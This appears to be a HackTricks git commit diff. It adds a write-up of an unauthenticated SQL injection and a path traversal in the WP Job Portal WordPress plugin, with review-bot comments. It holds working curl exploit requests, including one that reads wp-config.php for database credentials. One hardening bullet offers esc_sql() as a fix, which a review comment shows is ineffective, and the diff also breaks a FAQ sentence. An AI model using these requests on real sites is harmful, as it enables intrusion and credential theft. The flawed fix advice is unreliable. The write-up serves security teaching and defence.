Add content from: Multiple Critical Vulnerabilities Patched in WP Job Portal P...

HackTricks News Bot 2025-08-12 18:31:03 +00:00
parent 30fa8082d2
commit 3ccc2ea6f2
2 changed files with 79 additions and 2 deletions

@ -518,8 +518,86 @@ Also, **only install trustable WordPress plugins and themes**.
- **Limit login attempts** to prevent Brute Force attacks
- Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
### Unauthenticated SQL Injection via insufficient validation (WP Job Portal <= 2.3.2)
The WP Job Portal recruitment plugin exposed a **savecategory** task that ultimately executes the following vulnerable code inside `modules/category/model.php::validateFormData()`:
```php
$category = WPJOBPORTALrequest::getVar('parentid');
$inquery = ' ';
if ($category) {
$inquery .= " WHERE parentid = $category "; // <-- direct concat
}
$query = "SELECT max(ordering)+1 AS maxordering FROM "
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
```
Issues introduced by this snippet:
1. **Unsanitised user input** `parentid` comes straight from the HTTP request.
2. **String concatenation inside the WHERE clause** no `is_numeric()` / `esc_sql()` / prepared statement.
3. **Unauthenticated reachability** although the action is executed through `admin-post.php`, the only check in place is a **CSRF nonce** (`wp_verify_nonce()`), which any visitor can retrieve from a public page embedding the shortcode `[wpjobportal_my_resumes]`.
#### Exploitation
1. Grab a fresh nonce:
```bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
```
2. Inject arbitrary SQL by abusing `parentid`:
```bash
curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \
-d '_wpnonce=<nonce>' \
-d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id='
```
The response discloses the result of the injected query or alters the database, proving SQLi.
#### Hardening checklist
* Enforce **type validation** (`is_numeric()` for integers).
* Escape with **`esc_sql()`** or, even better, use **`$wpdb->prepare()`**.
* Treat *nonce-only* endpoints as **privileged** add `current_user_can()` / `is_user_logged_in()` where appropriate.
---
### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
Another task, **downloadcustomfile**, allowed visitors to download **any file on disk** via path traversal. The vulnerable sink is located in `modules/customfield/model.php::downloadCustomUploadedFile()`:
```php
$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output
```
`$file_name` is attacker-controlled and concatenated **without sanitisation**. Again, the only gate is a **CSRF nonce** that can be fetched from the resume page.
#### Exploitation
```bash
curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'task=downloadcustomfile' \
--data-urlencode '_wpnonce=<nonce>' \
--data-urlencode 'upload_for=resume' \
--data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php'
```
The server responds with the contents of `wp-config.php`, leaking DB credentials and auth keys.
#### Hardening checklist
* Sanitize filenames with helpers such as `sanitize_file_name()` or a custom `wpJP_clean_file_path()` that strips `../` & `./`.
* Make sure the **resolved path stays inside** the intended upload directory (`realpath()` + prefix check).
* Restrict the action to **authenticated roles** and validate the nonce.
---
## References
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
{{#include ../../banners/hacktricks-training.md}}
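Review bot: The SQLi hardening checklist offers `esc_sql()` as a fix, but in the vulnerable snippet `$category` is interpolated unquoted (`" WHERE parentid = $category "`), so quote-escaping alone does not block a payload such as `0 OR 1=1`; that bullet should point to integer coercion (`absint()` / `intval()`) or `$wpdb->prepare()` with a `%d` placeholder rather than presenting `esc_sql()` as an equivalent option. Two bullets also read as two sentences run together and need a separator (colon or dash): `2. **String concatenation inside the WHERE clause** no is_numeric() ...` and `* Treat *nonce-only* endpoints as **privileged** add current_user_can() ...`. Minor: the new `### Unauthenticated SQL Injection ...` heading is inserted directly after the `- Rename **wp-admin.php** ...` list item with no blank line; add one so the list and the new section render separately.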

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
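Review bot: The two question lines in this hunk differ only by the word `cite`, and `**How can I a page of HackTricks?**` is ungrammatical, so the line that survives the change must be `**How can I cite a page of HackTricks?**`. If the rendering lists the removed line first, this hunk is dropping the verb and should be reverted; the bibtex sentence that follows only makes sense under the "cite" wording.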
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}